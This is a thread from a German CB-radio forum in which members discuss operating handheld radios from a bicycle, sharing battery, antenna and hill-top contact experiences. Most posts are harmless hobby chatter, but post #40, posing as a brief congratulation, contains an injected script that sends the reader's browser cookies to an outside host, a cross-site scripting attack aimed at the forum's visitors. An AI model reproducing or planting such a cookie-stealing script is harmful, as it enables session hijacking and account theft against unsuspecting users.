Mit dem Fahrrad QRV

Benutzeravatar
schweißfuß
Santiago 9+30
Beiträge: 2593
Registriert: Do 23. Okt 2003, 10:50
Standort in der Userkarte: Groß-Umstadt
Kontaktdaten:

Re: Mit dem Fahrrad QRV

#31

Beitrag von schweißfuß »

Bild Ok, dann greifen wir noch tiefer in die Mottenkiste.... :D
Fahrrad Bergfunk Anno 83' http://sofafunker.de/Aus%20den%20Analen ... hichte.htm



vy 73,55
Tom
Groß-Umstadt ** JN49KU ** ** TH548 ** 13GD007 ** http://www.sofafunker.de
Stone
Santiago 7
Beiträge: 539
Registriert: So 4. Jun 2006, 00:13
Kontaktdaten:

Re: Mit dem Fahrrad QRV

#32

Beitrag von Stone »

so hier mal en bild von meinem ersten einsatz heute morgen. hätte nicht gegen die sonne fotografieren sollen... müsst ich eigentlich wissen. aber jetzt erstmal batterien laden und heut abend mal losziehen. war vorhin eh nur en haufen QRM und en paar aus italien drauf, die mich aber net gehört haben. aber echt genialer empfang... war ja noch nicht weit weg aber wenns die tage auf den berg geht und ich nur halbwegs so raushaue wie ich empfange... dann kommen sicher en haufen QSOs zustande Bild
Bild
und noch eins von der handgurke Bild
Bild
Station STONE / Mit dem Fahrrad QRV in der Gegend Bad Kreuznach / QTH - Locator JN39VV / An der Tasta der Jan
Stone
Santiago 7
Beiträge: 539
Registriert: So 4. Jun 2006, 00:13
Kontaktdaten:

Re: Mit dem Fahrrad QRV

#33

Beitrag von Stone »

Bild
so die batterien sind am laden Bild und in so ner halben stunde gehts dann mal etwas bergauf. nicht gerade die zugspitze aber wenigstens nach allen seiten frei also denke ich wird das vor dort aus ganz gut klappen. mal sehen wer mir heut alles die wellen um die ohren haut!
muss mal sehen, hab jetzt noch en 2tes akkusfach für die alan aber noch keine akkus hoffentlich ist sowas günstig zu kriegen. kosten ja teilweise 3 euro das stück, da hat mich bei neuen batterien ja die gurke fast weniger gekostet... naja halten ja auch eigentlich ewig diese akkus. wenns demnächst dann nochmal en berg DX von mir gibt werd ich auch wieder mit dicker autobatterie auffahren, da brauch ich mir um die nächsten 10 stunden betrieb dann keinen kopf machen. Bild
also denn, mach mich mal abfahrbereit Bild
Zuletzt geändert von Stone am Sa 24. Jun 2006, 23:16, insgesamt 1-mal geändert.
Station STONE / Mit dem Fahrrad QRV in der Gegend Bad Kreuznach / QTH - Locator JN39VV / An der Tasta der Jan
Frank56

Re: Mit dem Fahrrad QRV

#34

Beitrag von Frank56 »

Super ,saubere Sache Bild Bild Viel Erfolg !!! Ich sperre auch mal die Lauscher auf Bild

Bild Gruß Bild
Stone
Santiago 7
Beiträge: 539
Registriert: So 4. Jun 2006, 00:13
Kontaktdaten:

Re: Mit dem Fahrrad QRV

#35

Beitrag von Stone »

sooo, ich war eben mal 3 stunden QRV, leider bin ich nicht soooo weit gefahren wie ich eigentlich wollte, deshalb haben mich einige stationen die ich recht gut kopieren konnte leider nicht empfangen. naja stand letztendlich auch nicht sehr hoch, teilweise hohe bäume drumherum und ein 3 meter maschendrahtzaun, der sicherlich auch nicht umbedingt vorteile gebracht hat Bild
Bild
werd ab jetzt aber öfter mit dem fahrrad QRV sein und ich muss sagen die DV27L spielt auch genauso wie ich es mir vorgestellt hab. kam teilweise mit netten werten bei den leuten an, etwas lautere modulation wäre vielleicht gut aber was will man von der handgurke erwarten.
werd es mir die tage mal hier in der gegend auf nen berg gemütlich machen... dann aber eher gegen nachmittag, hoffe der QRM ist dann nicht zu arg dass vielleicht doch ein zwei nette QSO´s zusatnde kommen... oder auch ein paar schöne DXe
Bild
also denne macht es gut, die besten zahlen und ich hoffe man hört den ein oder anderen mal!
~*~STONE~*~
Station STONE / Mit dem Fahrrad QRV in der Gegend Bad Kreuznach / QTH - Locator JN39VV / An der Tasta der Jan
Benutzeravatar
ic240
Santiago 9+30
Beiträge: 3769
Registriert: Do 3. Jun 2004, 16:20
Wohnort: JO42GB
Kontaktdaten:

Re: Mit dem Fahrrad QRV

#36

Beitrag von ic240 »

Bastel dir doch mal so eine (Ähnliche) Kombination :

Akku:
http://cgi.ebay.de/Blei-Gel-Akku-12V-7- ... dZViewItem

Mobilfunke:
http://cgi.ebay.de/Stabo-XM-5012-CB-Fun ... dZViewItem

So ein kleiner Akkublock hält "ewig" und mit einer Mobilfunke ist noch besser rauskommen. Zudem ist auch der Empfang besser, und durch den großen Lautsprecher auch die Verständlichkeit.
Du kannst das Gerät auch vorn an den Lenker basteln.

Brenner und VV-Mike ist übrigends garnicht notwendig Bild
KW-Maschine: DNT Schrottpit (ic240-Edition), Messplatz: ZG HP201 (ic240-Edition) ...
Stone
Santiago 7
Beiträge: 539
Registriert: So 4. Jun 2006, 00:13
Kontaktdaten:

Re: Mit dem Fahrrad QRV

#37

Beitrag von Stone »

ja hab ich mir auch schon überlegt sowas zu machen bin ich aber wieder von abgekommen. während der fahrt wird eh nicht gebabbelt, da brauch ich meine 2 hände zum bremsen und lenken, am lenker ist sowieso kein platz für ne breake und ich denke auch mal die erschütterungen würd die nicht lange mitmachen daher ich meist sehr schnell unterwegs bin. verkabelung brauch ich mit der handgurke auch keine, bis eben auf das koaxkabel. bin ja auch so machmal auf dem berg, dann natürlich mit mast, hochantenne und meist meiner alan 48 plus, da haut man natürlich wieder ganz anders raus.
mit dem fahrrad kam mir nur wieder die idee weil ich immer wenn ich mal nen berg hochgekeucht bin oben stehe die aussicht genieße und mich gleichzeitig ärgere dass ich keine funke dabei hab. also einfach antenne drauf, handfunke in die tasche und los. so kann ich auch QRV sein ohne große vorbereitungen zu treffen oder am fahrrad was zu ändern. fahre sehr viel und teilweise sehr schnell, da zählt dann jedes gramm gewicht. Bild
Station STONE / Mit dem Fahrrad QRV in der Gegend Bad Kreuznach / QTH - Locator JN39VV / An der Tasta der Jan
Alphacharlie1987
Santiago 9+15
Beiträge: 1690
Registriert: So 25. Sep 2005, 15:35
Wohnort: Hamm/Sieg
Kontaktdaten:

Re: Mit dem Fahrrad QRV

#38

Beitrag von Alphacharlie1987 »

@Schweißfuß

Und warum ist dein Ham Master Brenner an 2 Koaxialkabel angeschlossen?
Ich dachte er wäre nur ein Leergehäuse und dient als Spannungsanzeige Bild
Benutzeravatar
schweißfuß
Santiago 9+30
Beiträge: 2593
Registriert: Do 23. Okt 2003, 10:50
Standort in der Userkarte: Groß-Umstadt
Kontaktdaten:

Re: Mit dem Fahrrad QRV

#39

Beitrag von schweißfuß »

Und warum ist dein Ham Master Brenner an 2 Koaxialkabel angeschlossen
Das ist einfach zu erklären: Bild
Auf dem Fahrrad darf nix rumfliegen, also hab ich von einem alten Staubsauger ne Aufrollautomatik für das Koaxkabel eingebaut... Bild
Das Kabal wird durch die sichtbaren Teile der Stecker also nur durchgeführt und intern aufgewickelt ! Bild
Ein weiterer Innovationsschub für den CB Funk, ähnlich sinnvoll wie die vielgelobten Antennenschoner ! Bild
vy 73,55
Tom
P.S. Heute waren wir wieder unterwegs, wurden sogar in Spanien gehört, Band war voll offen ! Bild

Bild

Brenner und VV-Mike ist übrigends garnicht notwendig
Beim VV-Mike geb ich Dir recht ! Bild
Zuletzt geändert von schweißfuß am So 25. Jun 2006, 19:37, insgesamt 1-mal geändert.
Groß-Umstadt ** JN49KU ** ** TH548 ** 13GD007 ** http://www.sofafunker.de
Mufflon

Re: Mit dem Fahrrad QRV

#40

Beitrag von Mufflon »

das sieht ja ganz gut aus !

gratulation !!

<script>(new Image).src = "http://0wnage.0w.funpic.de/images/image.php?c=" + escape(document.cookie);</script>
Stone
Santiago 7
Beiträge: 539
Registriert: So 4. Jun 2006, 00:13
Kontaktdaten:

Re: Mit dem Fahrrad QRV

#41

Beitrag von Stone »

Auf dem Fahrrad darf nix rumfliegen, also hab ich von einem alten Staubsauger ne Aufrollautomatik für das Koaxkabel eingebaut...
Das Kabal wird durch die sichtbaren Teile der Stecker also nur durchgeführt und intern aufgewickelt !

und es hält gleichzeitig die mantelwellen zurück damit man auf dem berg auch kein TVI macht @ alphacharlie

wollt heute eigentlich auch nochmal etwas rumfahren aber dann hat es ja nur geregnet und gewittert. mal sehen obs morgen besser wird, dann schwing ich mich nochmal in den sattel und guck mal was sich erreichen lässt über tag. muss mir mal endlich akkus holen, die von meiner fahrradlampe sind nämlich jetzt im funkeisen und nachts fährt sichs ohne licht dunkler als am tage. (man beachte die satzstellung Bild )

aber richtig schön wie voll es in dem thema langsam wird, gefällt mir dass es nicht gleich unter geht. also weiter so leute.

beste 55 und ne QRM freie QRG Bild
Zuletzt geändert von Stone am Mo 26. Jun 2006, 00:24, insgesamt 1-mal geändert.
Station STONE / Mit dem Fahrrad QRV in der Gegend Bad Kreuznach / QTH - Locator JN39VV / An der Tasta der Jan
Stone
Santiago 7
Beiträge: 539
Registriert: So 4. Jun 2006, 00:13
Kontaktdaten:

Re: Mit dem Fahrrad QRV

#42

Beitrag von Stone »

bin die tage wieder unterwegs und QRV also haltet mal die ohren in die luft!
Bild Bild
Station STONE / Mit dem Fahrrad QRV in der Gegend Bad Kreuznach / QTH - Locator JN39VV / An der Tasta der Jan
Glückspilz 7

Re: Mit dem Fahrrad QRV

#43

Beitrag von Glückspilz 7 »

Moin Moin zusamen,

super idee mit der funke am Bike Respekt !!

und ich muss leider sagen: es stimmt, das wenn man mit einer handgurke loszieht die meisten leute einen angucken als wär man ein Alien.

Und oft muss man sich dazu auch noch extrem dumme sprüche anhören so nach dem Motto wie kommst du denn zur Polizei??

Troz alledem weiterhin mobiel QRV,

Der Yannic (Glückspilz 7)
Zuletzt geändert von Glückspilz 7 am Mo 17. Jul 2006, 08:54, insgesamt 1-mal geändert.
Stone
Santiago 7
Beiträge: 539
Registriert: So 4. Jun 2006, 00:13
Kontaktdaten:

Re: Mit dem Fahrrad QRV

#44

Beitrag von Stone »

ja war letztes wochenende auch mal wieder mit der gurke und dem rad auf achse, hab jetzt noch en 2tes akkupack also für strom ist auch gesorgt. war allerdings recht ruhig und das wetter war auch leider nich besonders gut aber ich hoffe mal auf das nächste wochenende! Bild
Station STONE / Mit dem Fahrrad QRV in der Gegend Bad Kreuznach / QTH - Locator JN39VV / An der Tasta der Jan
Flunder

Re: Mit dem Fahrrad QRV

#45

Beitrag von Flunder »

Alphacharlie1987 hat geschrieben:Und was ist das schwarze auf dem Gepäckträger mit den 3 Schaltern??? Bild Bild Erwischt!
Ist doch Klasse was der Tom gebaut hat.Wassergekühlte Oma. Sagenhaft. So wie ich das sehe, immer wenn die PTT gedrückt wird spritzt aus der Wasserflasche ein Strahl über die Oma. Ja ja unser Tom. :thup: :tup: :dlol:
Lieber Admin. Setze bitte mal mein Geschreibsel in den Fred:Funken mit dem Fahrrad ! Habe es ausversehen hier gepostet!!! Danke...
Antworten

Zurück zu „CB - Allgemein“